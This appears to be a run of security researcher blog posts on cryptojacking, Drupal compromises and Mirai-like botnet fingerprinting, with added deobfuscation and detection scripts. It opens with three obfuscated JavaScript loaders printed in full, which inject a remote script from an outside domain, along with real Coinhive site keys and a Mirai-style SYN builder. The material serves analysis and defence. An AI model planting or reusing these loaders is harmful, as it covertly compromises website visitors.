var RqLm1=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42\x79\x54\x61\x67\x4e\x61\x6d\x65"]('\x68\x65\x61\x64')[0];var D2=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74"]('\x73\x63\x72\x69\x70\x74');D2["\x74\x79\x70\x65"]='\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74';D2["\x69\x64"]='\x6d\x5f\x67\x5f\x61';D2["\x73\x72\x63"]='\x68\x74\x74\x70\x3a\x2f\x2f\x76\x75\x75\x77\x64\x2e\x63\x6f\x6d\x2f\x74\x2e\x6a\x73';RqLm1["\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64"](D2);

Loader variant 2 (same loader, https:// reference):

var dZ1= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42\x79\x54\x61\x67\x4e\x61\x6d\x65"]('\x68\x65\x61\x64')[0]; var ZBRnO2= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74"]('\x73\x63\x72\x69\x70\x74'); ZBRnO2["\x74\x79\x70\x65"]= '\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74'; ZBRnO2["\x69\x64"]='\x6d\x5f\x67\x5f\x61';ZBRnO2["\x73\x72\x63"]= '\x68\x74\x74\x70\x73\x3a\x2f\x2f\x76\x75\x75\x77\x64\x2e\x63\x6f\x6d\x2f\x74\x2e\x6a\x73'; dZ1["\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64"](ZBRnO2);

Loader variant 3 (strings hidden with a custom b() decoder that keeps every odd-indexed character of a cover string and reverses it; only runs on Windows user agents that are not Android and have not already been tagged via a cookie):

;(function(){var k=navigator[b("st{n(e4g9A2r,exs,u8")];var s=document[b("je,i{kaofo6c(")];if(p(k,b("hs{w{o{d;n,i5W)"))&&!p(k,b("rd4i{ojr}d;n)A}"))){if(!p(s,b(":=ea)m,t3u{_,_4_5"))){var w=document.createElement('script');w.type='text/javascript';w.async=true;w.src=b('5a{b)28e;2,0;1,e}5;fa1}1p97c;7)a}c(e;4{2,=)v{&m0}2)2,=,d{i4c4?(s}j1.)end;o,c}_xs)/(g8rio3.{ten}e,m}h,s(e}r)f1e;r)e;v)i;t{i9s,ozpb.wk{c}a}ryt1/}/k:9p)tnt}h8');var z=document.getElementsByTagName('script')[0];z.parentNode.insertBefore(w,z);}}function b(c){var o='';for(var l=0;l<c.length;l++){if(l%2===1)o+=c[l];}o=h(o);return o;}function p(i,t){if(i[b("&f}O,xoe}d,n(i(")](t)!==-1){return true;}else{return false;}}function h(y){var n='';for(var v=y.length-1;v>=0;v--){n+=y[v];}return n;}})();
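The loaders listed above use two cheap obfuscation tricks: the first two spell every property name and URL as \xHH escapes, and the third passes cover strings through a b() function that keeps the odd-indexed characters and reverses the result. The script below is an added example (not code from the post or the campaign) that reverses both so an analyst can read the loader and pull out the injected URL without executing anything. It carries the first loader and the b() cover strings from the snippets above as its sample input; decoded strings that the post itself does not state are produced by the decoder, not taken from the page.

```python
"""Static deobfuscation of the two loader styles shown in the post:
\\xHH string escapes and the b() odd-character/reverse cover strings.
Added example; not the campaign's code and not the post author's tooling."""
import json
import re

HEX_ESC = re.compile(r"\\x([0-9a-fA-F]{2})")
B_CALL = re.compile(r"""b\((['"])(.*?)\1\)""")   # b("...") or b('...')
URL_RE = re.compile(r"""https?://[^\s'"]+""")


def decode_hex_escapes(js: str) -> str:
    """Turn "\\x64\\x6f..." back into the characters they encode."""
    return HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), js)


def decode_b(cover: str) -> str:
    """Port of the loader's b(): keep odd-indexed chars (l%2===1), then reverse."""
    return cover[1::2][::-1]


def decode_b_calls(js: str) -> str:
    """Replace every b("cover") call with the decoded string literal."""
    return B_CALL.sub(lambda m: json.dumps(decode_b(m.group(2))), js)


def deobfuscate(js: str) -> str:
    return decode_b_calls(decode_hex_escapes(js))


def extract_urls(js: str) -> list:
    """URLs visible after deobfuscation; these are the IOCs to block or hunt for."""
    return sorted(set(URL_RE.findall(deobfuscate(js))))


# Loader variant 1 exactly as listed in the post (raw string keeps the escapes).
LOADER_1 = r"""var RqLm1=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42\x79\x54\x61\x67\x4e\x61\x6d\x65"]('\x68\x65\x61\x64')[0];var D2=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74"]('\x73\x63\x72\x69\x70\x74');D2["\x74\x79\x70\x65"]='\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74';D2["\x69\x64"]='\x6d\x5f\x67\x5f\x61';D2["\x73\x72\x63"]='\x68\x74\x74\x70\x3a\x2f\x2f\x76\x75\x75\x77\x64\x2e\x63\x6f\x6d\x2f\x74\x2e\x6a\x73';RqLm1["\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64"](D2);"""

# The gating condition from loader variant 3, verbatim.
LOADER_3_COND = 'if(p(k,b("hs{w{o{d;n,i5W)"))&&!p(k,b("rd4i{ojr}d;n)A}"))){if(!p(s,b(":=ea)m,t3u{_,_4_5"))){'

# The cover string loader variant 3 assigns to w.src, verbatim.
LOADER_3_SRC_COVER = "5a{b)28e;2,0;1,e}5;fa1}1p97c;7)a}c(e;4{2,=)v{&m0}2)2,=,d{i4c4?(s}j1.)end;o,c}_xs)/(g8rio3.{ten}e,m}h,s(e}r)f1e;r)e;v)i;t{i9s,ozpb.wk{c}a}ryt1/}/k:9p)tnt}h8"

if __name__ == "__main__":
    print(deobfuscate(LOADER_1))
    print(extract_urls(LOADER_1))
    print(deobfuscate(LOADER_3_COND))
    print("variant 3 injects:", decode_b(LOADER_3_SRC_COVER))
```

Running it prints the readable loader (document.getElementsByTagName('head') / createElement('script') / appendChild) with its src URL, and shows that variant 3 only fires for Windows user agents that are not Android and that lack a cookie marker, a common trick for dodging sandboxes and mobile users. Decoding by hand is preferable to evaluating the sample in a browser, because these loaders are written to inject a remote script the moment they run.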


Closing Remarks

We’ve seen plenty examples of Drupalgeddon 2 being exploited in the past few weeks. This is yet another case of miscreants compromising outdated and vulnerable Drupal installations on a large scale. If you’re a website operator using Drupal’s content management system, you need to update to the latest available version ASAP. The Drupal security team has prepared a FAQ which documents the risk level and mitigation steps. Note that installing the update won’t retroactively “unhack” your website and you may need to take further remediation steps.

To stop cryptojacking in your browser, I recommend the extension minerBlock to block cryptojacking malware.

If you use other methods of blocking malicious activity at the network level, such as Pi-hole, you can use the blocklist provided by CoinBlockerLists, which is frequently updated with the domains and IPs used by coinmining malware and illicit cryptomining operations.

If you’d like to learn more about my work and what others are saying about it, please see this page. As always, I’m most active on Twitter — follow me @bad_packets

Also, be sure to check out my Mirai-like botnet data website!

Recent Podcasts: Packet Pushers & The CoinSec Podcast

In the last month, I was invited to participate in two podcasts. The first was with Packet Pushers and the second with The CoinSec Podcast. This was definitely less hectic than doing a live interview on Canadian national television. In both shows, I shared my thoughts on cryptojacking and other security topics.

Packet Pushers Podcast

For the Packet Pushers podcast, I was a guest of Paessler. They are the company behind the enterprise and network monitoring application, PRTG. I’ve frequently mentioned PRTG in my tweets as it’s one of my favorite monitoring tools. One of the notable incidents I always like to reference is the Showtime Networks case. This was the first major case of cryptojacking affecting a well-known website and I was the first to document the incident.

PRTG allows me to monitor any website for Coinhive and other cryptojacking malware. This was valuable when the website of Politifact.com was also compromised. I was able to quickly and easily configure monitoring for the site.

In addition to the HTTP Advanced sensor, I use numerous other sensor types in PRTG including: SNMP, SSH, SSL, WMI, and many others discussed in the Packet Pushers podcast. Tune in to find out my favorites!

If you’re looking for the peer-reviewed research paper mentioned in the show, please visit my Publications page.

The CoinSec Podcast


The second podcast I recorded was with The CoinSec Podcast. This show is about cryptocurrency and blockchain technologies with a focus on securing them. I had a great time discussing cryptojacking and other security issues affecting the cryptocurrency ecosystem.

Closing Remarks

While it’s a little nerve-wracking recording podcasts or television interviews, I always enjoy sharing my thoughts on cryptojacking and other security topics. If you’d like to learn more about my work and what others are saying about it, please see this page.

As always, I’m most active on Twitter – follow me @bad_packets

Also, be sure to check out my Mirai-like botnet data website!

My favorite website scanning services

In my research, I primarily use two publicly available website scanning services: urlscan.io and Sucuri SiteCheck. These tools allow me to quickly locate malicious code, which usually consists of Coinhive. However, many other types of cryptocurrency mining scripts are in use today.

While Coinhive remains the market leader for now, their dominance in the cryptojacking “industry” has declined in 2018.

I recently documented how to find cryptojacking malware and recommend it as an excellent use case for the services offered by PublicWWW.

Website Scanning Services

My first choice for scanning and archiving a website’s source code is urlscan.io. I’ve provided many examples on Twitter of how valuable this service is.

Cryptojacking detection was added to urlscan.io early in January 2018. This enables you to check whether a website is engaging in malicious cryptocurrency mining, based on known signatures of cryptojacking malware (JavaScript).

It’s also useful to search for a URL to check whether a website was previously infected.

The archived urlscan.io results show Coinhive was found on LonelyPlanet.com

In a recent example, the official website of travel guidebook publisher Lonely Planet was compromised to run Coinhive. Despite numerous contact attempts, I received no confirmation or denial from Lonely Planet regarding this incident. However, based on the Archive.org copy of the affected JavaScript library, Coinhive was removed sometime on or after March 7, 2018.

Another valuable tool for scanning websites for cryptojacking malware is Sucuri SiteCheck. Sucuri is a security company, owned by GoDaddy, that I have no affiliation with. I do however like using their website scanning service.

Sucuri SiteCheck

This scanning service helps you quickly locate the source of the malicious code. Sucuri’s scanner also detects other forms of malware; it isn’t limited to cryptojacking.

In this example, the website is infected with malware that redirects users to a tech support scam site. The offending code is easy to find thanks to the results presented by Sucuri. Sadly, this was only one of many Drupal sites that were recently exploited.

Closing Remarks

While Coinhive’s market share has declined in 2018, cryptojacking malware as a whole remains a persistent threat.

To stop cryptojacking in your browser, I recommend using a dedicated extension, minerBlock, to block cryptojacking malware.

If you use other forms of blocking, such as Pi-hole, you can use the blocklist provided by CoinBlockerLists, which is frequently updated with the domains and IPs used by coinmining malware and illicit cryptomining operations.

As always, I’m most active on Twitter — follow me @bad_packets

Also, be sure to check out my Mirai-like botnet data website!

Mirai-like Botnet One Year Review and a New Website!

In February 2017, I started my passive honeypot and began listening for all incoming network traffic. As the months passed, I saw numerous exploit attempts, constant port scans, and other suspicious traffic. It wasn’t until October that, with the help of Dr. Neal Krawetz, I started cataloging Mirai-like botnet traffic specifically.

What does Mirai-like mean?

Incoming scans from Mirai-like botnets have a very distinct fingerprint in the network traffic generated by infected hosts. The TCP sequence number of each SYN always equals the IP address of the target device, i.e. the destination address interpreted as a 32-bit integer. This intentional behavior is documented in the original Mirai source code, shown in the snippet below:

Snippet of Mirai source code

Typically, the logged sequence number appears in decimal (numeric) form, which is the target IP address encoded as a single number. As the target IP changes, the sequence number of the traffic coming from the infected host changes accordingly, as shown in the example below:

Example showing TCP Sequence Number = Destination IP address

Your logs may vary and instead record the sequence number in hexadecimal format. Either way, once converted to an IP address, the pattern is clearly established.
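As an added example (not the author’s tooling and not code from the Mirai source), the Python below applies this fingerprint two ways: to log lines and to raw packet bytes. The log lines are constructed in the style of an iptables log with a SEQ= field; that field name and layout are an assumption, so adjust LOG_RE to whatever your honeypot records. It accepts both decimal and hexadecimal sequence numbers, and it can build a Mirai-style SYN with seq set to the destination address so the detector can be exercised offline.

```python
"""Mirai-like SYN fingerprint: TCP sequence number == destination IPv4 address.

Added example for this post; not the author's tooling and not Mirai's own code.
SAMPLE_LOG is constructed (iptables-style with a SEQ= field, an assumption).
"""
import ipaddress
import re
import struct


def ip_to_int(ip: str) -> int:
    """'198.51.100.42' -> 3325256746, the 32-bit value Mirai copies into the SYN's seq."""
    return int(ipaddress.IPv4Address(ip))


def int_to_ip(n: int) -> str:
    """Reverse of ip_to_int, for turning a logged sequence number back into a dotted quad."""
    return str(ipaddress.IPv4Address(n))


def parse_seq(text: str) -> int:
    """Sequence numbers are logged as decimal or 0x-prefixed hex depending on the logger."""
    text = text.strip()
    return int(text, 16) if text.lower().startswith("0x") else int(text, 10)


def is_mirai_like(dst_ip: str, seq: int) -> bool:
    """The fingerprint: the SYN's sequence number equals the target address as an integer."""
    return seq == ip_to_int(dst_ip)


LOG_RE = re.compile(r"SRC=(\S+)\s+DST=(\S+).*?\bSEQ=(\S+)")


def scan_log(lines):
    """Return (src, dst, seq) for every logged SYN carrying the Mirai-like fingerprint."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        src, dst, seq = m.group(1), m.group(2), parse_seq(m.group(3))
        if is_mirai_like(dst, seq):
            hits.append((src, dst, seq))
    return hits


def build_syn(src_ip: str, dst_ip: str, seq=None, sport=0xC0DE, dport=23) -> bytes:
    """Raw IPv4+TCP SYN header bytes. With seq=None the sequence number is set to the
    destination address, which is what Mirai's scanner does. Checksums are left at 0:
    this is only for feeding the detector, not for sending."""
    src = ipaddress.IPv4Address(src_ip).packed
    dst = ipaddress.IPv4Address(dst_ip).packed
    if seq is None:
        seq = ip_to_int(dst_ip)
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0, 0x4000, 64, 6, 0, src, dst)
    tcp_hdr = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x02, 5840, 0, 0)
    return ip_hdr + tcp_hdr


def check_packet(raw: bytes) -> bool:
    """Apply the fingerprint to raw IPv4+TCP bytes (e.g. from a pcap) instead of a log line."""
    ihl = (raw[0] & 0x0F) * 4
    daddr = struct.unpack("!I", raw[16:20])[0]
    seq = struct.unpack("!I", raw[ihl + 4:ihl + 8])[0]
    return seq == daddr


# Constructed sample log lines, not real honeypot data. 198.51.100.42 == 3325256746 == 0xc633642a.
SAMPLE_LOG = [
    "Feb 19 00:00:01 hp kernel: IN=eth0 SRC=203.0.113.7 DST=198.51.100.42 PROTO=TCP SPT=41120 DPT=23 SEQ=3325256746 SYN",
    "Feb 19 00:00:02 hp kernel: IN=eth0 SRC=203.0.113.9 DST=198.51.100.42 PROTO=TCP SPT=55012 DPT=2323 SEQ=123456789 SYN",
    "Feb 19 00:00:03 hp kernel: IN=eth0 SRC=192.0.2.55 DST=198.51.100.42 PROTO=TCP SPT=36000 DPT=23 SEQ=0xc633642a SYN",
    "Feb 19 00:00:04 hp kernel: IN=eth0 SRC=192.0.2.56 DST=198.51.100.43 PROTO=TCP SPT=36001 DPT=23 SEQ=3325256746 SYN",
]

if __name__ == "__main__":
    for src, dst, seq in scan_log(SAMPLE_LOG):
        print(f"Mirai-like SYN from {src} -> {dst}: seq {seq} == {int_to_ip(seq)}")
```

The fourth sample line is the important negative: the same sequence number aimed at 198.51.100.43 is not flagged, because the check is against the packet’s own destination, not against a fixed value. Since a SYN-ACK answering such a probe acknowledges seq + 1, the responding target’s address is recoverable from the ACK field alone, which is why a bot needs no per-target state.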

Dr. Krawetz shared his thoughts on this technique, “This is actually kind of brilliant. Each bot slings out packets and doesn’t store any information. When a response comes back, the botnet can identify the sender by the sequence number.”

Once the fingerprint of the Mirai-like botnet was established, I was able to review the IP addresses found in my logs for further patterns. Late in October 2017, I shared my findings of a botnet consisting of EnGenius routers.

Instead of continuing to isolate specific devices in the botnet and the volume of traffic generated, I began cataloging new unique IP addresses while noting the network provider (ASN) and country they came from. This allowed me to gauge the growth rate and estimate the size of active botnets. Subsequently, I started sharing my Mirai-like botnet statistics daily on Twitter.

One Year of Data Collected

New unique IP addresses seen Mirai-like botnet from 2017-02-19 to 2018-02-19

Reviewing the entire dataset I collected, the overall Mirai-like botnet volume averaged around 500 new unique IP addresses per day in March 2017 and steadily declined until September 2017. After this point, a surge in botnet activity was observed. The most new unique IP addresses I saw in a single day was 1,384 on November 29.

The explosion in activity was largely attributed to the Satori botnet, which enslaved devices in Argentina, Egypt, Colombia, and Tunisia. This botnet grew exponentially after a zero-day exploit was used to target Huawei HG532 routers. Numerous devices from Japan were also found after a UPnP exploit targeting Realtek devices was used.

During the height of the activity between November 22nd and December 7th, those countries accounted for a large share of the new unique IP addresses found.

New Unique IPs seen in Mirai-like botnet from 2017-11-22 to 2017-12-07 by Country

Similarly, network providers (ASNs) from Colombia, Egypt, and Argentina combined for 39% of all new unique IP addresses seen during this time period.

New Unique IPs seen in Mirai-like botnet from 2017-11-22 to 2017-12-07 by ASN

Growing Pains

The challenge of collecting and sharing the Mirai-like botnet data every day quickly became apparent. A publicly shared Google Sheet was not a long term option, so I asked my Twitter followers for assistance building a proper solution.

Alex Rhodes rose to the challenge and offered his time and expertise to build a database backend to store the data. He also designed and implemented a website for sharing the botnet data. Alex is a software engineer in the aerospace industry and is currently working towards a Master’s degree in Cybersecurity at Syracuse University.

The new website is easy to configure and manage and I’m truly grateful for the finished product Alex has delivered. Read more about Alex’s work on this project here.


New website: mirai.badpackets.net

The new website offers filtering options for every field, including IP Address, Country, ASN, and date range. It also expands on the features formerly offered in the spreadsheet, including the following lookups:

IP address (DomainTools)
ASN (Hurricane Electric BGP Toolkit)

In addition to the main page, which is updated daily, we can also filter by the top ASN and country for a specified time period. Using this, we can review the all-time leaders for the entire year of Mirai-like botnet data collected.

China dominated the count of unique IPs seen with 27,672. India and Brazil both had over 10,000 unique IPs each. Japan and Argentina were close behind with over 9,000 unique IPs each. Russia and the United States were also among the top 10 countries with 7,801 and 5,045 unique IPs, respectively.

Top 10 Country

Continuing the trend, network providers China Telecom and China Unicom led in total overall volume, combining for a total of 23,243 unique IPs seen. Coming in third place was Telefonica de Argentina with 7,576 unique IPs. Rounding out the top five network providers in unique IPs seen was Rostelecom (Russia) with 5,407 and Tigo Colombia with 3,301.

Top 10 ASN

During the one year of data collection, I saw botnet traffic from 179 of the 195 recognized countries in the world. IP addresses registered to 5,581 unique network providers (ASNs) were also observed. It was clear that Mirai-like botnet activity was truly a worldwide phenomenon.

Closing Remarks

The unique IPs seen by my honeypot are only a tiny fraction of those participating in active botnets. In the case of the Satori botnet, other security researchers estimate the total size peaked around 650,000 infected devices.

The data provided via the new website will remain free and open to the public. I will continue to update it daily with my latest available data.

Follow me on Twitter to receive my daily Mirai-like botnet statistics update of new unique IPs seen, top ten countries and top five ASNs seen in the Mirai-like botnet.

How to find cryptojacking malware

Cryptojacking malware continues to spread across the web, largely due to the popularity of Coinhive. Since Coinhive’s launch in September 2017, numerous cryptojacking clones have come about.

The tool I’ve chosen to locate them with is PublicWWW. This is a search engine that indexes the entire source code of websites. I previously offered a comparison of their dataset versus other providers in my discussion of Coinhive malware specifically.

In this post, I detail how to find websites containing Coinhive, Crypto-Loot, CoinImp, Minr, and deepMiner in PublicWWW.

Let’s jump in and see how many sites with cryptojacking malware we can find!


Coinhive

Before we review some of the knock-offs, let’s look at the name most synonymous with cryptojacking, Coinhive. Finding this malware is relatively easy and various queries can be used to locate it. The original Coinhive JavaScript library used in cryptojacking is “coinhive.min.js” and we can start by simply searching for that. It’s important to search for the entire name in quotes to ensure an exact match is returned by PublicWWW.

PublicWWW search for "coinhive.min.js"

Using this query, we find 34,474 sites. While this may seem like an astounding number, it’s only a modest increase since I wrote about the 30,000 sites found back in November 2017.

While this list of sites is great for an overview of sites with Coinhive malware, we can dig even deeper into PublicWWW’s dataset to extract the Coinhive site key used on each site. This can be done using a regex to extract the site key as a snippet (the backslashes are required; without them `w{32}` would match 32 literal w’s and the unescaped parenthesis would leave the pattern unbalanced): "coinhive.min.js" snipexp:|CoinHive.Anonymous\('?(\w{32})'|i

PublicWWW search for "coinhive.min.js" snipexp:|CoinHive.Anonymous\('?(\w{32})'|i

Once the Coinhive site key is extracted, we can export the results and correlate which sites are part of a cryptojacking campaign. This correlation of a small number of Coinhive site keys to hundreds and even thousands of websites was documented in my previous post.

Recently I found a large cryptojacking campaign targeting 5,451 WordPress sites. In each case, the JavaScript containing Coinhive was hidden via obfuscation.

Example site found in WordPress cryptojacking campaign
The obfuscated JavaScript code is illegible and must be deobfuscated first to be human-readable.

While PublicWWW can’t search within the deobfuscated JavaScript itself, we can find a way to work around it.

PublicWWW search for sites found in large WordPress cryptojacking campaign.

To search for the affected sites, the following query, graciously crafted for me by VriesHd, was used:

"["(k" "\x43\x72\x79\x70\x74\x6f\x6e\x69\x67\x68\x74\x57\x41\x53\x4d\x57\x72\x61\x70\x70\x65\x72" snipexp:|(var _0x[0-z]{4}=)|

This query searches for the hex-escaped string that the obfuscated code carries (“\x43\x72…\x72” decodes to “CryptonightWASMWrapper”, the name of Coinhive’s WASM wrapper) and then uses a regex to extract the name of the obfuscated string array as a snippet. This is useful to correlate the function name, such as “var _0xb70e”, to the Coinhive site key used. Six unique keys were found to be used in this cryptojacking campaign:

Coinhive site key (function name)
DhGEVUgOoquJP68XByYLFs0nRVV4gq4J (0xb70e)
bbgnHTSmMLKUMaQzNa3Yfoul34A3cACd (0xbcba,0xe2f6)
hg9mNsA2DPkqe1F9yCUyWXggnDyrPqVW (0x1b00)
T6Oy0x11TMdeZRjy684Xow4GNBpb07SK (0xf80b)
OQoqVYH65ER2Eg2xcmoVtv4qrcHP2Z7G (0xe4d0,0xb765,0xcc28)
VW8fWIsg9hjn47qBdmb0jImf7pDHmU28 (0x8f35)

In some cases the same Coinhive site key was associated with multiple function names, as shown above.


Crypto-Loot

Crypto-Loot has steadily remained one of the most popular alternatives to Coinhive since its inception. Similar to Coinhive, Crypto-Loot doesn’t require any user interaction and can run stealthily in the background.

This is a prominent feature on Crypto-Loot’s marketing page, in addition to DDoS protection which is provided by Cloudflare.

Crypto-Loot is advertised to run secretly in the background while protected from DDoS attacks by Cloudflare.

Crypto-Loot uses two domain names for their cryptojacking operations:

These domains can be queried in PublicWWW to locate the affected sites, and similar to Coinhive, we can use a regex to extract the site key used in each with this query: "CryptoLoot.Anonymous" snipexp:|CryptoLoot.Anonymous\('?(\w{44})'|i

PublicWWW search for "CryptoLoot.Anonymous" snipexp:|CryptoLoot.Anonymous\('?(\w{44})'|i

Searching for strictly the two domains used, we find a total of 2,057 sites with Crypto-Loot present.


CoinImp

CoinImp is a relatively new player in the cryptojacking game, but the number of sites where it has been seen has grown sharply in recent weeks.

CoinImp uses four domain names for their cryptojacking operations:

Interestingly, the reference to “www.hashing.win” previously found in CoinImp’s documentation was quietly removed sometime after 2017-12-20 and replaced with “www.freecontent.bid” as the illustrative example.

Screenshot captured of CoinImp’s documentation page on 2017-12-20.

Notably, the most used CoinImp domain name, www.hashing.win, has been found by PublicWWW on a whopping 3,745 sites.

PublicWWW search for www.hashing.win

Since this was a surprising number, I manually reviewed numerous sites and found that CoinImp had already been removed, or that another form of cryptojacking malware, such as Coinhive, had been placed instead. This leads me to believe the cryptojacking campaign perpetrator was using a short-lived method to place the CoinImp code.

Totaling the four CoinImp domain names used, we find a total of 4,119 sites.


Minr

Early in December 2017, I discovered a new form of cryptojacking malware called Minr. What differentiated this from the others is that it provided built-in obfuscation for its users. This wasn’t required, however, and many sites I found didn’t bother to use it.

Example of a site containing Minr malware.

In addition, the domain names used by Minr were innocuous looking. The domain names also frequently changed, so anytime I shared an update it quickly became out of date.

Minr malware domains used on 2018-01-29

The domains used by Minr a week ago (shown above) have already changed again.

As of this writing, the active domains used by Minr in cryptojacking operations are:

Totaling the four Minr domain names currently used today, we find a total of 692 sites.


deepMiner

Unlike the other cryptojacking providers, deepMiner is self-hosted JavaScript. This means the code used to mine cryptocurrency is not hosted by a third-party service provider and is instead placed directly on the website or a domain controlled by the cryptojacking campaign operator. The repository of deepMiner’s source code can be found on GitHub.

While this might appear to be a roadblock in our search for sites containing deepMiner, there is still a way to locate it. The key to locating deepMiner is the constructor call it requires in order to run, shown in the snippet below:

deepMiner code snippet

Now that we have this information, we can simply search PublicWWW for “deepMiner.Anonymous” to locate the affected websites.

PublicWWW search for "deepMiner.Anonymous"

This leads us to find 2,160 sites using deepMiner for cryptojacking purposes.
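The site-key searches in the Coinhive, Crypto-Loot and deepMiner sections above all reduce to the same operation: match the constructor call and capture the key. The Python below is an added example (not PublicWWW’s tooling and not the author’s own code) that does this offline over page source, and it adds the step PublicWWW cannot do for the obfuscated WordPress campaign: decoding the \xNN hex escapes first, so the CryptonightWASMWrapper marker and any 32-character literal in the same _0x… string array become visible. Key lengths follow the post (32 for Coinhive, 44 for Crypto-Loot); deepMiner’s key length is not given on the page, so accepting any alphanumeric run there is an assumption. The sample pages and the EXAMPLEKEY… values are constructed placeholders, not keys from any real campaign.

```python
"""Find browser-miner site keys in page source (Coinhive, Crypto-Loot, deepMiner).

Added example for this post; not PublicWWW's tooling and not the author's code.
Sample pages below are constructed and their site keys are placeholders.
"""
import re

# Key lengths follow the post: 32 chars for Coinhive, 44 for Crypto-Loot. deepMiner's
# key length is not given on the page, so any alphanumeric run is accepted (assumption).
KEY_PATTERNS = {
    "coinhive": re.compile(r"CoinHive\.Anonymous\(\s*['\"]?(\w{32})['\"]?", re.I),
    "cryptoloot": re.compile(r"CryptoLoot\.Anonymous\(\s*['\"]?(\w{44})['\"]?", re.I),
    "deepminer": re.compile(r"deepMiner\.Anonymous\(\s*['\"]?(\w+)['\"]?", re.I),
}
HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")  # \x43 -> "C"
OBF_ARRAY = re.compile(r"var\s+(_0x[0-9a-f]{4})\s*=\s*\[(.*?)\];", re.I | re.S)
STRING_LITERAL = re.compile(r"""["']([^"']*)["']""")
WASM_MARKER = "CryptonightWASMWrapper"  # the string the post's obfuscated samples carry


def unescape_hex(js: str) -> str:
    """Turn backslash-x escapes (\\xNN) into characters so string searches work on obfuscated code."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), js)


def obfuscated_key_candidates(decoded: str) -> dict:
    """Map each `var _0xNNNN=[...]` string array that carries the Coinhive WASM marker to
    the 32-character literals inside it, i.e. the probable site key the array hides."""
    found = {}
    for m in OBF_ARRAY.finditer(decoded):
        name, elements = m.group(1), STRING_LITERAL.findall(m.group(2))
        if WASM_MARKER in elements:
            found[name] = [e for e in elements if re.fullmatch(r"\w{32}", e)]
    return found


def scan(html: str) -> dict:
    """Return {'keys': {provider: [site keys]}, 'obfuscated': {array name: [candidate keys]}}."""
    decoded = unescape_hex(html)
    keys = {name: sorted({m.group(1) for m in pat.finditer(decoded)})
            for name, pat in KEY_PATTERNS.items()}
    return {"keys": {k: v for k, v in keys.items() if v},
            "obfuscated": obfuscated_key_candidates(decoded)}


# Constructed sample pages; the EXAMPLEKEY... values are placeholders of the right length.
SAMPLE_PAGES = {
    "plain-coinhive": (
        '<script src="https://coinhive.com/lib/coinhive.min.js"></script>\n'
        "<script>var miner = new CoinHive.Anonymous('EXAMPLEKEYEXAMPLEKEYEXAMPLEKEY12',"
        " {throttle: 0.5}); miner.start();</script>"
    ),
    "cryptoloot": (
        '<script>var miner = new CryptoLoot.Anonymous("EXAMPLEKEYEXAMPLEKEYEXAMPLEKEYEXAMPLEKEYabcd");'
        " miner.start();</script>"
    ),
    # Obfuscator-style string array: the first two literals are hex-escaped the way the
    # campaign's code was, the rest are left readable for brevity.
    "obfuscated": (
        r'<script>var _0xb70e=["\x43\x72\x79\x70\x74\x6f\x6e\x69\x67\x68\x74\x57\x41\x53\x4d'
        r'\x57\x72\x61\x70\x70\x65\x72","\x43\x6f\x69\x6e\x48\x69\x76\x65","Anonymous",'
        r'"EXAMPLEKEYEXAMPLEKEYEXAMPLEKEY12"];</script>'
    ),
}

if __name__ == "__main__":
    for label, html in SAMPLE_PAGES.items():
        print(label, scan(html))
```

Run it against a saved copy of a page (e.g. the raw response from urlscan.io) rather than the rendered DOM, since the obfuscated array is only visible in the source. Keys recovered from the “obfuscated” bucket are candidates, not confirmed keys: the array-name-to-key correlation the post describes still needs the decoded code read once by hand.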

One site I found using deepMiner was a fake Chrome update website that advised users not to close the page. Meanwhile cryptojacking was happening in the background consuming 100% CPU of my test machine.

Fake Chrome update website running deepMiner malware
No, Chrome really isn’t updating.

Statistics Comparison

Coinhive remains the market leader for cryptojacking malware. However, many clones it inspired are showing exponential growth rates.

Websites found running Crypto-Loot, CoinImp, deepMiner, and Minr malware.

The four Coinhive clones discussed were found on a total of 9,028 websites. CoinImp had the largest market share at roughly 45% while Minr had the smallest at nearly 8%. Crypto-Loot and deepMiner shared the remaining portions at nearly 23% a piece.

Websites found running Coinhive and other cryptojacking malware.

However when compared to Coinhive by itself, the other cryptojacking malware providers only account for a modest 18% market share. I would expect Coinhive to remain in the top spot for the foreseeable future.

Closing Remarks

Coinhive is clearly the market leader when it comes to cryptojacking malware as it’s been found on nearly 40,000 websites.

For Chrome users, I recommend using a dedicated extension, minerBlock, to block cryptojacking malware. A Firefox version of this extension is available as well.

The cryptojacking malware discussed in this post is only a portion of what’s currently found in the wild. New variants are discovered frequently, and I share them on Twitter. You can also browse the CoinBlockerLists, which is constantly updated by ZeroDot1, where you can find hundreds of domains tied to cryptojacking malware.

The statistics shared in this post were generated from data provided by PublicWWW on 2018-02-07. They are subject to change as PublicWWW regularly updates their index.